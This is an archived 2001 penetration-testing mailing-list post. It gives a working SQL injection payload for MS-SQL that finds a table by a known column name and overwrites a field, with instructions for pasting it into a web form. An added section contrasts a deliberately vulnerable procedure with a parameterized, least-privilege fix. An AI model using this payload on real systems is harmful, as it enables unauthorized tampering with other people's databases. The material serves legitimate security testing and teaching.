Penetration Testing mailing list archives
Re: sql insertion
From: H D Moore <hdm () secureaustin com>
Date: Sun, 27 May 2001 18:09:18 -0500
I know it's bad form to answer my own question, but I thought others might find this useful. To update a field in a table without knowing the name of the table, you can do this:

_____________________________
# this finishes off the original select
bogusdata';
# start the table find TSQL
declare @SQLQ NVARCHAR(1024);
set @SQLQ = 'UPDATE ' + (select name from sysobjects where id = (select id from syscolumns where name = 'KnownColumn'));
# make the query
set @SQLQ = @SQLQ + N' SET fname = ''OWNED'' WHERE KnownColumn = ''somevalue'' ';
# execute it
EXECUTE sp_executesql @SQLQ;
# force everything after to a comment
--
_____________________________

To actually use the query above, remove all of the # comments and place everything on the same line, then paste it into the form field. The KnownColumn field is one I happened to guess based on the function of the application. There has _got_ to be an easier way to do this; the above method only works if the target table is the only one in the database with that column name.

-HD

On Saturday 26 May 2001 04:02 pm, H D Moore wrote:
I have a buggy web application which takes an input field and places it in the middle of an SQL query, then executes it against a MS-SQL server. I can rewrite the query because single quotes are used to encapsulate the input field, and the script doesn't strip out the single quote character.
[ snip ]
Is there a way to select the object ID of a known column name from the syscolumns metatable, pass that object ID into another subselect against the sysobjects metatable to get the table name, and finally use that table as part of a final query?

-HD
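The query-building pattern the thread describes, beside the form that closes it, as an added example that is not code from the post or from the application HD Moore was testing. The table name dbo.Customers and the role name app_reader are assumptions; fname and KnownColumn are the column names the post mentions.

```sql
-- Added example, not code from the post. dbo.Customers and app_reader are
-- assumed names; fname and KnownColumn come from the post.

-- Vulnerable pattern: the form value is spliced into the query text between
-- single quotes. A value containing a quote ends the literal early, and the
-- remainder is run by sp_executesql as ordinary TSQL, which is exactly the
-- opening the post describes.
CREATE PROCEDURE dbo.FindCustomer_Unsafe
    @Input NVARCHAR(256)
AS
BEGIN
    DECLARE @SQLQ NVARCHAR(1024);
    SET @SQLQ = N'SELECT fname FROM dbo.Customers WHERE KnownColumn = '''
              + @Input + N'''';
    EXECUTE sp_executesql @SQLQ;
END;
GO

-- Hardened pattern: the query text is a constant, and the value travels in
-- sp_executesql's separate parameter list, so the server compares it as data
-- no matter how many quotes, semicolons or comment markers it contains.
CREATE PROCEDURE dbo.FindCustomer_Safe
    @Input NVARCHAR(256)
AS
BEGIN
    DECLARE @SQLQ NVARCHAR(1024);
    SET @SQLQ = N'SELECT fname FROM dbo.Customers WHERE KnownColumn = @p';
    EXECUTE sp_executesql @SQLQ, N'@p NVARCHAR(256)', @p = @Input;
END;
GO

-- Second layer: the post's chain ends in an UPDATE issued under the web
-- application's login. Dynamic SQL run through sp_executesql is checked
-- against the caller's permissions, not the procedure owner's, so a login
-- that only holds SELECT on the application tables cannot complete that
-- UPDATE even if a quote does get through.
CREATE ROLE app_reader;
GRANT SELECT ON dbo.Customers TO app_reader;
GRANT EXECUTE ON dbo.FindCustomer_Safe TO app_reader;
```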
Current thread:
- sql insertion H D Moore (May 26)
- Re: sql insertion H D Moore (May 28)